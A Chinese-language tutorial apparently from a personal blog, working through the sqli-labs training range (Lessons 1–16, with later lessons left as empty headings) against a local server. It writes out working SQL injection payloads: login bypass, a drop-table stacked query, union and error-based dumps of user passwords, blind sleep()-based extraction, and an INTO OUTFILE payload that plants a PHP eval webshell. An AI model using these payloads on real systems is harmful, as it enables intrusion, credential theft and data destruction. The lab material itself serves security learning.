SQL注入学习——sqli-labs闯关(Basic Challenges)

文章目录

• • • 前言
    • 一、漏洞介绍
    • • 1、什么是SQL注入？
      • 2、SQL注入原理：
      • 3、注入漏洞分类：
    • 二、靶场练习
    • • 基础知识:
      • Less1 基于错误的GET单引号字符型注入
      • Less2 基于错误的GET数字型注入
      • Less3 基于错误的GET单引号变形注入
      • Less4 基于错误的GET双引号注入
      • 盲注介绍：
      • Less5 基于报错的GET单引号盲注
      • Less6 基于报错的GET双引号盲注
      • Less7 导出文件GET字符型注入
      • Less8 布尔型GET单引号盲注
      • Less9 基于时间的GET单引号盲注
      • Less10 基于时间的GET双引号盲注
      • Less11 基于错误的POST单引号注入
      • Less12 基于错误的POST双引号变形注入
      • Less13 基于报错的POST单引号变形盲注
      • Less14 基于报错的POST双引号盲注
      • Less15 基于时间的单引号POST盲注
      • Less16 基于时间的双引号POST盲注
      • Less17 基于错误的更新查询POST注入
      • Less18 基于错误的用户代理，头部POST注入
      • Less19 基于头部的Referer POST报错注入
      • Less20 基于错误的cookie头部POST注入

前言

今天开始学习 SQL 注入的相关知识，通过 sqli-labs 靶场来练习。靶场地址

一、漏洞介绍

1、什么是SQL注入？

SQL注入(SQL Injection)是一种常见的 Web 安全漏洞，攻击者通过构造SQL语句与后台数据库进行交互，达到获取或修改一些敏感数据，或者利用潜在的数据库漏洞进行攻击的目的。

2、SQL注入原理：

SQL注入是发生于 Web 应用与数据库层的安全漏洞，漏洞的本质是代码和数据未分离，通过在用户可控参数中注入SQL语句，若程序未对输入的指令进行合法性判断，注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行，达到编写程序时意料之外结果的攻击行为。

例：

下图是一个正常的登录表单，输入正确的账号和密码后，程序会查询数据库，如果存在此用户并且密码正确，将会成功登录；如果用户不存在或者密码不正确，则会提示账号或者密码错误。

接下来使用一个比较特殊的用户 1' or 1=1# 登录，输入用户名：1’ or 1=1#，密码可以随意填写或者不写，点击“登录”按钮后，发现是可以正常登录的。

为什么密码随意输入都可以进入后台呢？数据库里并没有 1’ or 1=1# 这个用户，难道是程序出错了吗？

通过分析SQL语句，发现最终执行的SQL语句为:

select * from user where username='$name' and password='$pass';

当输入这个特殊用户 1’ or 1=1# 时，最终执行的SQL语句为:

select * from user where username='1' or 1=1# and password=''

此时的#后面的 password 根本起不了任何作用，因为它已经被注释了，而且 username='1' or 1=1这条语句永远为真，那么最终执行的SQL语句相当于:

select * from user //查询user表所有的数据条数

很显然，返回条数大于0，所以可以顺利通过验证，登录成功。这就是一次最简单的SQL注入过程。虽然过程很简单，但其危害却很大，比如，在用户名位置处输入以下SQL语句:

1'or 1=1;drop table user#

因为 SQL Server 支持多语句执行，所以这里可以直接删除 user 表。

由此可得知，SQL注入漏洞的形成原因就是：用户输入的数据被SQL解释器执行。

3、注入漏洞分类：

在测试注入漏洞之前，首先要弄清楚一个概念：注入的分类，明白了分类之后，再测试注入将起到事半功倍的效果。

常见的SQL注入类型包括：数字型 和 字符型。也有人把类型分得更多、更细。但不管注入类型如何，攻击者的目的只有一点，那就是绕过程序限制，使用户输入的数据带入数据库执行，利用数据库的特殊性获取更多的信息或者更大的权限。

1、数字型注入：

当输入的参数为整型时，如：ID、年龄、页码等，如果存在注入漏洞，则可以认为是数字型注入，数字型注入是最简单的一种。假设有URL http://www.xxx.com/test.php?id=3，可以猜测SQL语句为:

select * from table where id=3

测试步骤如下：

1、加单引号，URL：http://www.xxx.com/test.php?id=3’

对应的SQL：select * from table where id=3' 这时SQL语句出错，程序无法正常从数据库中查询出数据，就会抛出异常。

2、加and 1=1 ，URL：http://www.xxx.com/test.php?id=3 and 1=1

对应的SQL：select * from table where id=3 and 1=1 语句执行正常，返回数据与原始请求无任何差异。

3、加and 1=2，URL：http://www.xxx.com/test.php?id=3 and 1=2

对应的SQL：select * from table where id=3 and 1=2 语句执行正常，但却无法查询出数据，因为and 1=2始终为假。所以返回数据与原始请求有差异。

如果以上三个步骤全部满足，则程序就可能存在数字型SQL注入。

2、字符型注入：

当输入的参数为字符串时，称为字符型。数字型与字符型注入的最大区别在于：数字型不需要单引号来闭合，而字符串类型一般要使用单引号来闭合的。

• 数字型语句：select * from table where id =3

• 字符型语句：select * from table where username ='admin'

字符型注入最关键的是如何闭合SQL语句以及注释多余的代码。

当查询内容为字符串时 select * from table where username ='admin'

测试步骤：

1、加单引号：select * from table where username ='admin''，由于加单引号后变成三个单引号，无法执行，程序会报错。

2、加and 1=1（或者1=2） 此时SQL语句为：select * from table where username='admin and 1=1' ，也无法进行注入，因为admin and 1=1会被数据库当作查询的字符串。这时想要进行注入，则必须注意字符串闭合问题。

3、加'and 1=1--+（and 前面的单引号闭合'admin'，--注释后面的单引号 ）就可以继续注入，SQL语句如下：

select * from table where username ='admin' and 1=1--+'

当输入'and 1=2--+ 时，就和上面数字型同理，语句执行正常，但却无法查询出数据。

总结：数字型注入不需要闭合单引号以及注释；字符型注入必须闭合单引号以及注释多余的代码。

补充：

Mysql常用注释符:

• --：注意，这种注释符后边有一个空格，通常写为--+，+会在传递中变成空格
• #：通过#进行注释，URL编码为%23

3、其它分类：

总的来说，SQL注入只分为 “数字型” 与 “字符型”，因为对数据库进行数据查询时，输入数据一般只有两种：一个是数字类型，比如 where id=1、where age > 20，另外是一个字符串类型，比如 where name=‘root’、where datetime > ‘2013-08-18’。

可能不同的数据库语法上存在差异，但带入数据库查询时一定是数字或字符串。所以无论是POST注入，还是其类型注入，都可归纳为数字型注入或者字符型注入。

那么Cookie注入、POST注入等是怎么回事呢？其实这类注入主要通过注入的位置来分辨，比如有以下请求：

此时为POST 请求，但是POST数据中的username字段存在注入漏洞，一般都会直接说POST注入，却不再考虑username是什么类型的注入，如果此时的HTTP请求如下:

那么是否又应该叫做GET注入呢？

以下是一些常见的注入叫法：

• POST注入：注入字段在 POST 数据中

• Cookie注入：注入字段在Cookie数据中

• 延时注入：使用数据库延时特性注入

• 搜索注入：注入处为搜索的地点

• base64注入：注入字符串需要经过base64加密

🆗，了解了这些基础知识后就开始练习吧！

二、靶场练习

基础知识:

在开始注入之前，还需要知道一些关于 Mysql 的基础知识。

1）系统函数：

• version()——Mysql版本
• user()——数据库用户名
• database()——数据库名
• @@datadir——数据库路径
• @@basedir——获取安装路径
• @@version_compile_os——操作系统版本

2）字符串连接函数：

• concat(str1,str2,…) —— 没有分隔符地连接字符串
  例：concat_ws('11','22','33') ：112233

• concat_ws(separator,str1,str2,…) —— 含有分隔符地连接字符串，第一个参数是其它参数的分隔符。
  例：concat_ws(':','11','22','33') ：11:22:33

• group_concat(str1,str2,…) —— 使多行数据在一行显示，并以逗号分开

简单来说使用这三个函数的目的就是：能一次性查出多条信息。

3）常见的闭合符号：

	  $id
	 '$id'
	 "$id"
	 ($id)
	('$id')
	("$id")
   (('$id'))

4）系统数据库 information_schema，存储着所有的数据库的相关信息，里面有三张表：

• information_schema.schemata：包含所有库 库名的表
  常用字段：schema_name 数据库名

• information_schema.tables：包含所有库 表名的表
  常用字段：table_name 表名；table_schema 数据库名

• information_schema.columns：包含所有库 表字段的表
  常用字段：column_name 列名；table_schema 数据库名；table_name 表名

一般的，我们利用该表可以进行一次完整的注入，流程如下：

猜数据库

select schema_name from information_schema.schemata

猜某库的数据表

select table_name from information_schema.tables where table_schema=’xxxxx’

猜某表的所有列

select column_name from information_schema.columns where table_schema='xxx' and table_name=’xxxxx’

获取某列的内容

Select *** from ***

好的，正式开始吧！

---

Less1 基于错误的GET单引号字符型注入

先来确定是什么类型的注入，在http://127.0.0.1/sqli-labs/Less-1?id=1后面添加一个'

发现报错了，说明我们添加的单引号被数据库成功解析，就可能存在注入。接下来输入?id=1 and 1=2，发现页面没有变化，可以判断不是数字型注入。

---

PS：这里可能会有疑问，为什么id='1 and 1=2'还可以正常查询出数据？最直接的办法就是自己测试一下，如图：

经过测试，得出的结论是：在 select 查询时，程序会忽略后面的字符串，只让id与第一个字符进行对比，如果存在即返回数据。

---

接着输入'and 1=2 %23后页面发生变化，确定为字符型注入，并且闭合符号为单引号。

看下源码：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

确实是单引号，确定注入的类型后，我们就可以构造相应的的SQL语句进行攻击了。

这时需要用到联合查询的方式来获取想要的信息，使用联合查询的前提是 union 后面的 select 语句必须和前面查询的列的数量、顺序、类型相同，否则数据库会报错，所以需要先查字段数。

确定字段数可以使用 order by，即通过排序的方式测出字段数：

从1开始依次测试，当按第4列数据进行排序时报错了

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 4 %23

说明有三个字段，那么现在开始联合查询：

http://127.0.0.1/sqli-labs/Less-1/?id=1' union select 1,2,3%23

PS：select可以直接加数字串，不写后面的表名，它输出的内容就是我们select后的数字，这时select实际上没有向任何一个数据库查询数据，即查询命令不指向任何数据库的表。通常用来快速测试显示位。

先来看下这条SQL语句在数据库的执行情况：

程序在展示数据的时候通常只会取结果集的第一行，所以我们需要把前面的查询结果集变为空，这样才能显示我们想要的结果，同时又需要确定哪几个字段会被显示在页面上，这里令id=-1也可以直接在后面添加and 1=2两种方式都可以。再次测试：

可以看到2，3字段被显示出来，也就是说我们要在2或3字段上查询数据。🆗，知道了这些之后就可以真正开始SQL注入了！

1、爆数据库：

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+

成功得到所有的数据库！

2、查看当前数据库：

可以看到数据库名为：security，接着再查其他信息。

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,concat_ws(' : ',user(),database(),version())--+

OK，得到这些信息之后我们再来看看数据库有哪些表。

3、爆当前数据库的表：

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

可以看到有四张表，我们想要的用户信息通常在 users表中。

4、爆users列名：

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

这里需要注意指定 table_schema 字段，因为 users 表非常容易出现重复!

终于看到我们梦寐以求的 password 了！得到字段后接爆用户数据。

5、爆数据：

http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+

如果只有一个显示位可以改为：?id=-1' union select 1,2,group_concat(username,' : ',password) from security.users--+

注意：因 users 表存在重复问题，最好加上数据库（又是一个小细节！）

也可以单独爆一个用户：

http://127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,username,password from security.users where id=2 --+

🆗，第一关到此圆满结束！！

Less2 基于错误的GET数字型注入

和上题思路一样，加单引号报错，加and 1=2 程序执行正常，但却无法查询出数据，那么就确定是数字型SQL注入了。
看下源码

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

确实是数字型，🆗，剩下的就和第一关一样，可以随意爆数据了。

Less3 基于错误的GET单引号变形注入

加单引号，页面报错

根据报错消息可以推断出闭合符号为('$id')，测试 1') --+

程序执行正常，然后就可以进行注入了。

其余的 payload 与 less1 中一致，只需要 '改为')

Less4 基于错误的GET双引号注入

同样的思路，先加单引号，然而发现没有报错，再用双引号测试，发现报错了

根据报错信息，推断出闭合符号应该是：("$id")，测试：1") --+
然后就可以注入了，其余同上。

---

盲注介绍：

何为盲注？盲注就是在 sql 注入过程中，sql 语句执行后，查询的数据不能回显到前端页面上。此时，我们需要利用一些特殊的方法来得到数据，这个过程称之为盲注。盲注主要分为三类：

• 基于布尔的 SQL 盲注

• 基于时间的 SQL 盲注

• 基于报错的 SQL 盲注

因为这块内容较多，具体方法在下面的题目中详细讲解。

---

Less5 基于报错的GET单引号盲注

输入?id=1

没有显示数据，这是咋回事？看一下源码：

if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="3" color="#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}

可以看到程序并没有将 $row 这个查询结果输出，即正确结果没有回显，但是错误信息还是会显示。页面没有显示位，所以无法使用联合查询。

先来确定注入类型，加单引号报错，加 and 1=2 页面没有变化，即非数字型，加'and 1=2--+后页面发生变化，确定为字符型注入，并且闭合符号为单引号。

根据题目名字：双注入，查了一些大佬的文章之后终于明白了，双注入即 报错注入，利用嵌套查询来实现，形式为：select…(select…)，里面的 select 被称为子查询，执行顺序是先执行子查询，然后再执行外面的 select。

双注入主要涉及到了下面几个SQL函数：

rand()   随机函数，返回0~1之间的一个值
floor(a) 取整函数，返回小于等于a的一个整数,没有四舍五入
count()  聚合函数
group by 分组函数

详解请看这篇文章：双注入详解

双注入的原理总的来说就是：当一个聚合函数 count 后面出现 group by 分组语句时，会将查询的一部分结果以报错的形式返回，它有一个固定的公式。

构造sql语句：

Less-5/?id=-1' union select count(*),2,concat('*',(select database()),'*',floor(rand()*2))as a from information_schema.tables group by a--+  //这里我们给查询的数据起了另一个名：a

OK得到数据库了，然后就可以以同样地方式得到其他信息。

获取表名：

?id=-1' union select count(*),1, concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

查询用户信息：

?id=-1' union select count(*),2,concat('*',(select concat_ws(char(32,44,32),id,username,password) from users limit 1,1),'*',floor(rand()*2))as a from information_schema.tables group by a--+  

第五关结束。

Less6 基于报错的GET双引号盲注

与上关是同一类型，这关使用的是双引号闭合，其余过程与前面类似，不再赘述。

Less7 导出文件GET字符型注入

输入?di=1

还是没有显示数据，接着输入?id=1'

页面报错，说明可能存在注入，输入?id=1 and 1=2

回显正常，说明不是数字型注入。

输入?id=1'--+，显示报错，继续输入?id=1')--+页面仍然报错， 多次尝试1' 1" 1') 1") 1')) 最后发现是1'))，页面显示正常了。

查看下源码：

if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	echo 'You have an error in your SQL syntax';

看到正常回显都是 You are in… Use outfile…，报错信息统一返回 You have an error in your SQL syntax

同时他也给出了提示：use outfile 也就是说需要使用 outfile 函数：

outfile 函数的作用就是将数据库的查询内容导出到一个外部文件

语法：select...into outfile 'file_name'

可以把被选择的行写入一个文件中，前提是要拥有 file 权限才能使用。file_name 不能是一个已经存在的文件。

现在还不知道数据库的路径，可以借助前面几关来获取数据库的路径：@@basedir 获取安装路径

http://localhost/sqli-labs/Less-1/?id=-1‘ union select 1,2,@@basedir --+

这样我们就可以知道网站应该是在C:/phpStudy/WWW/下，尝试写入一句话木马 ，构造代码：

?id=-1')) union select 1,"<?php @eval($_POST['smk']);?>",3 into outfile "C:\\phpStudy\\WWW\\123.php" --+

注意：这里要用双反斜杠\\，否则建立出来的文件名会加前缀。

页面回显错误，不过不用管，查看一下文件夹，可以看到文件已将写入目录下了，打开菜刀，右键添加 http://127.0.0.1/123.php 地址填入你上传文件的地址，后面的小方框中填入你构造的密码，也就是smk

连接成功，然后就可以为所欲为了，嘿嘿嘿。

真实场景中目的主要是获得数据库管理员信息，先找到 index.php 文件，寻找其中sql连接语句。

顺藤摸瓜，找到 sql-connect.php 文件

打开 db-creds.inc

就可以获得数据库管理员信息了！

Less8 布尔型GET单引号盲注

这关内容稍多，所以单独拿出来了，详情请看这篇文章：文章链接

同时这关也可以使用导出文件，菜刀连接的方法做，步骤和上题一样，这里给出payload：

?id=1' union select 1,"<?php @eval($_POST['smk']);?>",3 into outfile "C:\\phpStudy\\WWW\\123.php" --+

Less9 基于时间的GET单引号盲注

这关内容也很多，本关链接

Less10 基于时间的GET双引号盲注

与上关是同一类型，这关使用的是双引号闭合，其余过程与前面类似，不再赘述。

Less11 基于错误的POST单引号注入

从这一关开始，我们就进入到 post 注入的世界了。

先在 username 输入admin'，password 空着，返回错误信息：

从错误信息可知在 username 处应该有注入点，并且可能为单引号闭合类型。

尝试万能语句admin' or 1=1#

发现登陆成功，而且用户默认为 dumb，确定为单引号闭合的字符型注入。

老样子，order by 确定列数，测得为2：

接着就开始爆破数据库、表名、列名。

1、数据库名：

在 username 栏输入：

1' union select 1,database()#

注意：post类型要用 # ，--+不能用

密码随便填

得到数据库名。

2、表名：

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

3、列名：

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

4、爆破用户名、密码

1' union select group_concat(username),group_concat(password) from security.users#

Less12 基于错误的POST双引号变形注入

先尝试 admin'，页面无变化，应该不是单引号字符注入。尝试 admin"，发现报错了。

从报错信息可知闭合方式为("")，再测试代码 admin") or 1=1#，密码随便，登录成功：

接下来就是爆数据库名、表名、列名、用户名以及密码，和第十一关一样，在此不再赘述。

Less13 基于报错的POST单引号变形盲注

Less14 基于报错的POST双引号盲注

和上关类似，这关使用的是双引号闭合，只需修改为admin"即可。

Less15 基于时间的单引号POST盲注

尝试admin'、admin"、)，发现没有回显报错信息，页面也没有任何变化，那么 bool 盲注就无法使用，那就只能说明可能为时间盲注。

多次测试，当输入下面代码时

admin' and sleep(5)#

时间延迟了5秒，确定闭合符号为单引号：

注意：这里不能使用1' and sleep(5)#，因为前面的GET型中我们知道?id=1这个条件本来就是true，而我们测试POST型的 username 为1，这个条件本身为 false，因为数据库没有这个用户，逻辑符是and：一假则假，所以不能使用。这里是知道存在用户 admin 直接用了。

如果不知道用户名可以使用万能语句进行测试，当输入1' or 1=1#时，登陆成功，页面变化了，说明闭合符号就是单引号。

测试数据库名：

admin' and if(substr((select database()),1,1)='s',sleep(5),1)#

页面经过5s后响应，得到数据库第一位，接下来按部就班进行爆破，与前面 less9 类似，在此不再赘述。

Less16 基于时间的双引号POST盲注

和上关一样，区别是这关使用的双引号闭合，只需修改为admin"即可。

admin" and if(substr((select database()),1,1)='s',sleep(5),1)#

Less17 基于错误的更新查询POST注入

Less18 基于错误的用户代理，头部POST注入

Less19 基于头部的Referer POST报错注入

Less20 基于错误的cookie头部POST注入